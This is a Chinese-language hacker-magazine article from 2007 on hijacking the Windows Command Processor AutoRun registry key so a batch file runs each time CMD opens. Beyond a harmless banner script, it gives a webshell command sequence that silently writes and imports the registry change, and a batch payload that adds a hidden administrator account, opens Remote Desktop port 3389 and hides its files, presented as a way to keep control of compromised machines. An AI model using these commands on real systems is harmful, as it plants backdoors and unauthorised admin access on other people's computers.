小心,CMD也闹鬼!
小心,CMD也闹鬼!
作者:冰的原点说明:文章已发表于黑客手册07年11期,转载请注明出处!
CMD?大家熟悉吧?我们可以在这里面查看进程,查看端口号,可以干许多的事!可是你有没有想过,当我们打开CMD的瞬间,我们就有可能中了木马或者病毒了!这可不是说的玩的,现在就让我们一起看看就是怎么一回事?
话说回来,这还是我有一回在网上转的时候,看到别人可以用这个方法来装扮你的CMD窗口。当时我就想,既然你可以装扮你的窗口,为什么不能干别的呢?我们开始吧!装扮CMD的方法很简单,就是写一个批处理,内容如下:
@ECHO OFF
cls
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ 冰的原点 "
echo "+ "
echo "+ 我的博客:http://hi.baidu.com/冰的原点 "
echo "+ "
echo "+ "
echo "+ 欢迎大家访问 "
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++"
title 冰的原点
color E
保存为11.bat,随便放在哪个盘里,这里我放在C盘,然后找到注册表,到这个目录下:[HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand Processor],在右边出现了一个字符串值:autorun.然后右键修改,在弹出的对话框中填入11.bat的绝对路径。如图1
说到这里,大家可能已经想到了这篇文章要讲的是什么了。不过,我在做测试的时候,还是遇到些麻烦.我们把原来代码改成这样:start http://www.baidu.com
然后保存。看看会出现什么效果,如图3.
想法一:
提权。曾经我想过用这个方法来用做提权,先在webshell里执行:
ECHO Windows Registry Editor Version 5.00>door.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand Processor]>>door.reg
ECHO "autorun"="c:\Recycled\13.bat">>door.reg
REGEDIT /S door.reg
DEL /F /Q door.reg
然后把13.bat传到c:Recycled下,然后等着管理员上钩。我在本机上自己用NETBOX搭建个WEB环境,测试的时候确实是成功了。可是我后来转念一想,要是能够执行CMD命令了,还用着到这样么?确实用来提权效果就不明显了。
想法二:
保护我们的肉鸡。这个想法实施起来也可行!我们把他们的注册表做下手脚,然后传个13.bat上去,13.bat内容如下:
@echo off
net user admin$ angel /add & net localgroup administrators admin$ /add
wrsky.exe -o 3389
attrib +h +s +a +r 13.bat
attrib +h +s +a +r wrsky.exe
这里的wrsky.exe是指开3389的工具,不需要重启的哦。把它和13.bat 放在同一个目录下.这样的效果很明显,只要一动CMD,就会自动添加admin$的管理员帐户,而且会神不知鬼不觉得把3389给开了!我在本机做的测试,大家看图5,6.
想法三:
这次我想到了病毒。因为好多人都喜欢在CMD下杀毒,我想如果病毒对HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand Processor下的autorun项值进行监视,防止我们修改注册表,然后再加载些病毒或者木马之类的东东的话,这样我们打开CMD时就有可能中更多的毒,伤的更深!
这篇文章的方法很有局限性,写这篇文章的作用就是想抛砖引玉,给大家提供个思路而已,我想肯定还有更多的方法把这个方法装扮的更加隐藏,更有危害性。如有不足之处,还请大家指教,欢迎大家到论坛和我交流,我的ID是冰的原点.
评论暂时关闭